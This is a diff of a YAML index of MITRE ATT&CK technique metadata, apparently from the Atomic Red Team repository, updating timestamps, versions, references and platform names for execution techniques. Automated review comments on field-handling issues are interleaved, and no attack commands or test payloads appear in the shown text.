Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -29254,30 +29572,29 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
execution:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
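Review bot: for T1574.012 this hunk drops both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement visible in its context, whereas most entries in this patch that lose `spec_version` keep an `x_mitre_attack_spec_version` line, usually bumped to 3.2.0. If the generator emitted the 3.2.0 value earlier in the T1574.012 object, outside this hunk, that is fine; otherwise the field is lost for that technique and should be restored, since consumers rely on it to tell which ATT&CK spec the object follows.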
@@ -29324,7 +29641,7 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -29356,8 +29673,8 @@ execution:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -29371,6 +29688,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
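Review bot: the new `Red Canary - Atomic Red Team` reference points at this repository's own atomics/T1053.005/T1053.005.md on the master branch, so the index now carries a self-referential link whose target breaks if the atomics tree is ever restructured; the URL is upstream ATT&CK text and should not be edited here, but a link check over `external_references` URLs in CI would catch a move of that file before the index ships a dead link.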
@@ -29383,16 +29704,19 @@ execution:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1047:
technique:
- modified: '2024-04-11T18:13:25.130Z'
+ modified: '2024-10-15T15:20:57.328Z'
name: Windows Management Instrumentation
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -29458,7 +29782,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1047
atomic_tests: []
T1129:
@@ -29535,66 +29858,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1129
atomic_tests: []
T1059.007:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Cody Thomas, SpecterOps
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
- type: attack-pattern
- created: '2020-06-23T19:12:24.924Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1059.007
- url: https://attack.mitre.org/techniques/T1059/007
- - source_name: NodeJS
- url: https://nodejs.org/
- description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
- - source_name: JScrip May 2018
- url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
- description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
- June 23, 2020.
- - source_name: Microsoft JScript 2007
- url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
- description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
- ECMAScript …. Retrieved June 23, 2020.
- - source_name: Microsoft Windows Scripts
- url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
- description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
- June 23, 2020.
- - source_name: Apple About Mac Scripting 2016
- url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
- description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
- 14, 2021.
- - source_name: SpecterOps JXA 2020
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
- 2021.
- - source_name: SentinelOne macOS Red Team
- url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
- description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
- APIs Without Building Binaries. Retrieved July 17, 2020.'
- - source_name: Red Canary Silver Sparrow Feb2021
- url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
- description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
- wings: Outing macOS malware before it takes flight. Retrieved April 20,
- 2021.'
- - source_name: MDSec macOS JXA and VSCode
- url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
- description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
- with VSCode Extensions. Retrieved April 20, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-07-30T14:12:52.698Z'
name: 'Command and Scripting Interpreter: JavaScript'
description: |-
Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
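Review bot: the removed block for T1059.007 (platforms, domains, contributors, id, created, external_references) is not deleted content but is re-emitted further down in a different key order, so this 66-line removal is serialization churn rather than a change of substance; if the generator can sort keys deterministically (or preserve upstream order), future bundle refreshes will diff as the handful of real changes they are, which makes reviewing the `modified` and `x_mitre_version` updates far easier.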
@@ -29607,31 +29875,83 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_contributors:
+ - Cody Thomas, SpecterOps
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
Monitor for execution of JXA through osascript
and usage of OSAScript
API that may be related to other suspicious behavior occurring on the system.
Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+ created: '2020-06-23T19:12:24.924Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/007
+ external_id: T1059.007
+ - source_name: Apple About Mac Scripting 2016
+ description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+ 14, 2021.
+ url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+ - source_name: MDSec macOS JXA and VSCode
+ description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+ with VSCode Extensions. Retrieved April 20, 2021.
+ url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+ - source_name: Microsoft JScript 2007
+ description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+ ECMAScript …. Retrieved June 23, 2020.
+ url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+ - source_name: Microsoft Windows Scripts
+ description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+ - source_name: JScrip May 2018
+ description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+ June 23, 2020.
+ url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+ - source_name: NodeJS
+ description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+ url: https://nodejs.org/
+ - source_name: SentinelOne macOS Red Team
+ description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+ APIs Without Building Binaries. Retrieved July 17, 2020.'
+ url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+ - source_name: SpecterOps JXA 2020
+ description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+ 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: Red Canary Silver Sparrow Feb2021
+ description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+ wings: Outing macOS malware before it takes flight. Retrieved April 20,
+ 2021.'
+ url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1059.007
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
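Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM) is removed from T1059.007 in this hunk and nothing re-adds it, unlike the other reordered fields (`x_mitre_contributors`, `x_mitre_platforms`, `x_mitre_domains`) which reappear at new positions; the Cron entry later in this patch still carries `x_mitre_permissions_required: - User` as unchanged context, so confirm upstream really dropped the field for T1059.007 rather than the generator skipping it.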
@@ -29689,9 +30009,8 @@ execution:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1559.002:
@@ -29783,20 +30102,19 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1559.002
atomic_tests: []
T1204.002:
technique:
- modified: '2023-04-21T12:22:19.740Z'
+ modified: '2024-09-25T20:50:34.876Z'
name: 'User Execution: Malicious File'
description: "An adversary may rely upon a user opening a malicious file in
order to gain execution. Users may be subjected to social engineering to get
them to open a file that will lead to code execution. This user action will
typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
Adversaries may use several types of files that require a user to execute
- them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
- may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+ them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+ .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
to increase the likelihood that a user will open and successfully execute
a malicious file. These methods may include using a familiar naming convention
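Review bot: T1559.002 keeps `x_mitre_attack_spec_version: 3.1.0` as unchanged context while its `spec_version: '2.1'` line is removed, whereas the surrounding entries move to 3.2.0; that can be legitimate if upstream has not touched the object since the 3.1.0 spec, but it is worth a quick check that this entry was not missed by the refresh.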
@@ -29824,7 +30142,7 @@ execution:
- Linux
- macOS
- Windows
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -29844,33 +30162,13 @@ execution:
url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1204.002
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -29887,6 +30185,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -29897,9 +30196,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -29907,8 +30210,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests:
- name: Cron - Replace crontab with referenced file
@@ -30062,7 +30381,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -30087,12 +30406,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -30172,11 +30489,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -30236,12 +30552,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -30339,9 +30654,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -30358,19 +30673,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
@@ -30379,7 +30693,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -30416,11 +30730,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -30457,11 +30770,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
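Review bot: the platform list for T1059.009 (Cloud API) replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider`; anything in this repository keyed on the old platform names (per-platform index files, matrix or filter generation, any test metadata that still uses the old names) will stop matching this technique, so those artifacts need to be regenerated or renamed in the same change rather than left to drift.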
@@ -30480,13 +30792,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -30565,12 +30876,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -30581,6 +30891,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -30591,16 +30902,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
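Review bot: the platform list for T1059 swaps `Office 365`, `Azure AD` and `Google Workspace` for `Office Suite` and `Identity Provider`, consistent with the ATT&CK platform consolidation that the 2024-10-14 `modified` stamp points at; any index, filter or CSV keyed on the old platform names needs the same rename in this patch, otherwise tests for this technique silently drop out of the per-platform views.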
